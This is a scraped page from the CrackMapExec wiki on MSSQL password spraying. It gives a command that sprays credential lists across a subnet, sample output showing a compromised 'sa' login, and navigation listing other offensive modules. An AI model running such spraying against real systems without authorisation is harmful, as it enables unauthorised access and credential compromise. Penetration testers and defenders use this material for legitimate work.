π±
π±
π±
π±
CrackMapExec ~ CME WIKI
Public Release - v5.2.2
@byt3bl33d3r
@mpgn_x64
Searchβ¦
Introduction
π₯
News 2022
Changelog
Sponsoring CME
Other Gitbook
Getting Started
Installation
Selecting & Using a Protocol
Target Formats
Using Credentials
Using Kerberos
Using Modules
Database General Usage
π
BloodHound integration
Report bugs or new features
π²
Audit Mode
SMB protocol
π
Scan for vulnerabilities
Enumeration
Password spraying
Authentication
Command execution
Spidering Shares
Get and Put files
Obtaining Credentials
π
Defeating LAPS
π
Spooler, WebDav running ?
LDAP protocol
Authentication
ASREPRoast
Kerberoasting
Unconstrained delegation
Admin Count
Machine Account Quota
Get user descriptions
π
Exploit ESC8 (adcs)
WINRM protocol
Password spraying
Authentication
Command execution
π²
Defeating LAPS
MSSQL protocol
Password spraying
Authentication
MSSQL Privesc
MSSQL command
Windows command
SSH protocol
Password spraying
Authentication
Command execution
π²
RDP Protocol
Password spraying
Install aardwolf lib
Powered By
GitBook
Password spraying
Password spraying (without bruteforce)
1
#~ cme mssql 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
Copied!
Expected Results:
1
MSSQL 10.10.10.59 1433 None [-] ERROR(TALLY): Line 1: Login failed for user 'test1'.
2
MSSQL 10.10.10.59 1433 None [+] sa:password (Pwn3d!)
Copied!
By default CME will exit after a successful login is found. Using the
--continue-on-success
flag will continue spraying even after a valid password is found. Usefull for spraying a single password against a large user list.
β
WINRM protocol - Previous
Defeating LAPS
Next - MSSQL protocol
Authentication
Last modified
1yr ago
Copy link